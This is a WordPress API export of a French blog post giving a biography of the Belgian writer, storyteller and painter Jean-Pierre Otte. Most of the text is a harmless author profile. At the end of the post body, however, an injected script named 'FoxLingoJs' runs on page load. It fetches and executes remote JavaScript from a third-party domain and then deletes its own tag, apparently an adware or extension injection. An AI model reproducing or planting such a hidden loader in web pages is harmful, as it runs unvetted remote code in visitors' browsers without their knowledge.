{"id":1580,"date":"2010-12-12T07:47:17","date_gmt":"2010-12-12T06:47:17","guid":{"rendered":"http:\/\/www.e-cartable.fr\/vasa-lecture\/?p=1580"},"modified":"2013-09-20T15:23:23","modified_gmt":"2013-09-20T14:23:23","slug":"otte-jean-pierre","status":"publish","type":"post","link":"http:\/\/www.e-cartable.fr\/vasa-lecture\/otte-jean-pierre\/","title":{"rendered":"Otte Jean-Pierre"},"content":{"rendered":"<p><a href=\"http:\/\/www.e-cartable.fr\/vasa-lecture\/?attachment_id=2546\" rel=\"attachment wp-att-2546\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2546 alignnone\" alt=\"Jean-Pierre Otte\" src=\"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-content\/uploads\/2013\/09\/Jean-Pierre-Otte.jpg\" width=\"250\" height=\"187\" srcset=\"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-content\/uploads\/2013\/09\/Jean-Pierre-Otte.jpg 250w, http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-content\/uploads\/2013\/09\/Jean-Pierre-Otte-220x164.jpg 220w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/a>\u00a0 Jean-Pierre Otte est un \u00e9crivain belge, n\u00e9 le 10 septembre 1949 \u00e0 Ferot-Ferri\u00e8res dans les Ardennes.<\/p>\n<p>\u00a0Avide de savoir, il s&rsquo;est passionn\u00e9 en autodidacte et il \u00e9tudie des disciplines aussi diverses que la biologie, la physique, la philosophie et les mythologies du monde. Sp\u00e9cialiste des mythes de la Cr\u00e9ation, il s\u2019adonne aussi \u00e0 la botanique et \u00e0 l\u2019observation des insectes (<i>L\u2019amour en eaux dormantes<\/i>) et manifeste son all\u00e9gresse de vivre dans ses <i>Histoires du plaisir d\u2019exister<\/i>.<\/p>\n<p>\u00a0En 1976, para\u00eet son premier livre et d\u00e8s 1978, il vit de sa plume et de sa voix.<\/p>\n<p>\u00a0Outre son travail d&rsquo;\u00e9crivain, il excelle dans d&rsquo;autres activit\u00e9s : Chroniqueur dans les journaux (\u00e0 La Libre Belgique, le Monde, r\u00e9cemment dans Le Nouvel Observateur, dans l\u2019Express, et dans Notre Histoire), conteur \u00e0 la radio (RTBF, France Culture) et en spectacle, conf\u00e9rencier r\u00e9gulier dans les Universit\u00e9s \u00e9trang\u00e8res et pour l\u2019Alliance fran\u00e7aise depuis 1990.<\/p>\n<p>\u00a0Sp\u00e9cialiste des mythes de la cr\u00e9ation, Jean-Pierre Otte les a transcrits pendant une dizaine d\u2019ann\u00e9es dans <i>Les Matins du Monde<\/i>.<\/p>\n<p>\u00a0Jean-Pierre OTTE a re\u00e7u<i> le prix Nature<\/i> de la Fondation de France, jury pr\u00e9sid\u00e9 par Jean Dorst de l\u2019Institut des Sciences Naturelles\u00a0: prix d\u00e9cern\u00e9 pour la rigueur scientifique et la qualit\u00e9 litt\u00e9raire de ses travaux en botanique et en entomologie.<\/p>\n<p>Certains ouvrages ont \u00e9t\u00e9 traduits notamment en Chine, aux Etats-Unis, en Allemagne, en Hongrie et en Gr\u00e8ce. Une vingtaine de m\u00e9moires et de th\u00e8ses universitaires ont d\u00e9j\u00e0 \u00e9t\u00e9 consacr\u00e9s \u00e0 son \u0153uvre.<\/p>\n<p>&nbsp;<\/p>\n<p>Install\u00e9 depuis I984 sur le causse, il vit \u00e0 Larnagol dans le d\u00e9partement du Lot, en France, entour\u00e9 d\u2019animaux familiers. Fascin\u00e9 par la femme, \u00e9picurien, il aime la marche et le vin.<\/p>\n<p>\u00c9crivain, conteur, conf\u00e9rencier et peintre, il est un des auteurs les plus originaux de notre \u00e9poque.<\/p>\n<p>Depuis les ann\u00e9es 80, Jean-Pierre Otte est un peintre \u00e0 part enti\u00e8re (derni\u00e8re exposition \u00e0 la <i>Galerie Bastien-Art<\/i> de Bruxelles et \u00e0 la <i>Galerie P&amp;V<\/i> de Li\u00e8ge).<\/p>\n<p>\n<script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n\/\/ < ![CDATA[\n(function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();\n\/\/ ]]><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 Jean-Pierre Otte est un \u00e9crivain belge, n\u00e9 le 10 septembre.<\/p>\n","protected":false},"author":4,"featured_media":2546,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[164],"tags":[],"jetpack_featured_media_url":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-content\/uploads\/2013\/09\/Jean-Pierre-Otte.jpg","_links":{"self":[{"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/posts\/1580"}],"collection":[{"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/comments?post=1580"}],"version-history":[{"count":0,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/posts\/1580\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/media\/2546"}],"wp:attachment":[{"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/media?parent=1580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/categories?post=1580"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.e-cartable.fr\/vasa-lecture\/wp-json\/wp\/v2\/tags?post=1580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}